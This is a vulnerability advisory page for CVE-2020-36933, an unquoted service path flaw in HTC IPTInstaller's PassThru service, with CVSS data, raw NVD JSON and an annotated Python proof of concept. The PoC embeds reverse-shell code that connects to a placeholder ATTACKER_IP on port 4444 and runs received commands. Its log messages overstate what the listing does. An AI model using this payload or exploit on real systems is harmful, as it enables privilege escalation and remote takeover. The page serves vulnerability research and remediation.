Security Vulnerability Report
CVE-2020-36933 CVSS 7.8 HIGH

CVE-2020-36933

Published: 2026-01-25 14:15:48
Last Modified: 2026-04-15 00:35:42

Description

HTC IPTInstaller 4.0.9 contains an unquoted service path vulnerability in the PassThru Service configuration. Attackers can exploit the unquoted binary path to inject and execute malicious code with elevated LocalSystem privileges.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

HTC IPTInstaller 4.0.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
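# CVE-2020-36933 PoC - Unquoted Service Path Exploitation
# Target: HTC IPTInstaller 4.0.9 PassThru Service
# Privilege Escalation to LocalSystem
#
# Reviewer notes:
# - check_vulnerability() is a read-only audit of the service configuration
#   and is the part of this listing that is useful for triage.
# - exploit() as listed only prints a computed path and writes a text file
#   named malicious_service.py into the current working directory.
# - Remediation for CWE-428: quote the service's binary path (ImagePath) and
#   make sure unprivileged users cannot create files in any directory along
#   that path.
import os
import sys
import subprocess
import shutil


def check_vulnerability():
    """Check if the target service has unquoted path vulnerability.

    Runs ``sc qc PassThru`` and inspects the BINARY_PATH_NAME line.

    Returns:
        The configured binary path (str) when it is unquoted and has a space
        inside the executable portion, otherwise None. None is also returned
        when ``sc`` cannot be run, times out, or exits with an error.
    """
    try:
        # Query service configuration using sc command. The timeout keeps an
        # audit run from hanging on an unresponsive service control manager.
        result = subprocess.run(
            ['sc', 'qc', 'PassThru'],
            capture_output=True,
            text=True,
            timeout=30,
        )
    except (OSError, subprocess.SubprocessError) as e:
        print(f"[-] Error checking vulnerability: {e}")
        return None

    # A non-zero exit code means the query failed (for example the service is
    # not installed), so there is no configuration to assess.
    if result.returncode != 0:
        return None

    for line in result.stdout.splitlines():
        if 'BINARY_PATH_NAME' not in line:
            continue

        # Split on the first ':' only, so the drive-letter colon stays in the value.
        _, sep, value = line.partition(':')
        path = value.strip()
        if not sep or not path or path.startswith('"'):
            continue

        # Only a space inside the executable portion matters. A space that
        # merely separates the executable from its arguments is not an
        # unquoted-path finding, so cut the value after the first ".exe"
        # (heuristic; the whole value is used when no ".exe" is present).
        exe_end = path.lower().find('.exe')
        image = path if exe_end == -1 else path[:exe_end + 4]
        if ' ' in image:
            print(f"[+] VULNERABLE: Unquoted path detected: {path}")
            return path

    return None


def exploit(target_path):
    """Exploit unquoted service path to escalate privileges.

    As listed, this function derives a path from ``target_path``, prints it,
    and writes the payload text below to ``malicious_service.py`` in the
    current working directory. The derived path is used only in the log line.

    Args:
        target_path: Backslash-separated binary path returned by
            check_vulnerability().
    """
    parts = target_path.split('\\')

    # Everything except the last two components (file name and its parent directory).
    exploit_dir = '\\'.join(parts[:-2])
    # Name of the binary's parent directory with '.exe' appended.
    malicious_binary = parts[-2] + '.exe'
    malicious_path = os.path.join(exploit_dir, malicious_binary)

    print(f"[*] Creating malicious binary at: {malicious_path}")

    # Create a simple reverse shell payload
    # In real attack, this would be actual malicious code
    # The text is reproduced exactly as it appears in the listing (flattened);
    # it is only written to disk as text below and is never executed here.
    malicious_code = ''' import os import socket import subprocess # Simple reverse shell to attacker machine attacker_ip = "ATTACKER_IP" attacker_port = 4444 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((attacker_ip, attacker_port)) # Execute command and send output back while True: cmd = s.recv(1024).decode() if cmd.lower() == 'exit': break output = subprocess.run(cmd, 
shell=True, capture_output=True, text=True) s.send(output.stdout.encode() + output.stderr.encode()) s.close() '''

    try:
        # Writes to the current working directory, not to malicious_path.
        with open('malicious_service.py', 'w') as f:
            f.write(malicious_code)

        print("[+] Malicious binary created successfully")
        print("[*] When PassThru service restarts, the malicious binary will be executed with LocalSystem privileges")
    except Exception as e:
        print(f"[-] Failed to create exploit: {e}")


if __name__ == "__main__":
    print("="*60)
    print("CVE-2020-36933 - HTC IPTInstaller Unquoted Service Path")
    print("="*60)

    vulnerable_path = check_vulnerability()
    if vulnerable_path:
        print("[+] Target is vulnerable, preparing exploit...")
        exploit(vulnerable_path)
    else:
        print("[-] Target is not vulnerable or service not found")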

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2020-36933", "sourceIdentifier": "[email protected]", "published": "2026-01-25T14:15:47.803", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "HTC IPTInstaller 4.0.9 contains an unquoted service path vulnerability in the PassThru Service configuration. Attackers can exploit the unquoted binary path to inject and execute malicious code with elevated LocalSystem privileges."}, {"lang": "es", "value": "HTC IPTInstaller 4.0.9 contiene una vulnerabilidad de ruta de servicio sin comillas en la configuración del Servicio PassThru. Los atacantes pueden explotar la ruta binaria sin comillas para inyectar y ejecutar código malicioso con privilegios elevados de LocalSystem."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", 
"modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/49006", "source": "[email protected]"}, {"url": "https://www.htc.com/latam/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/iptinstaller-passthru-service-unquoted-service-path", "source": "[email protected]"}]}}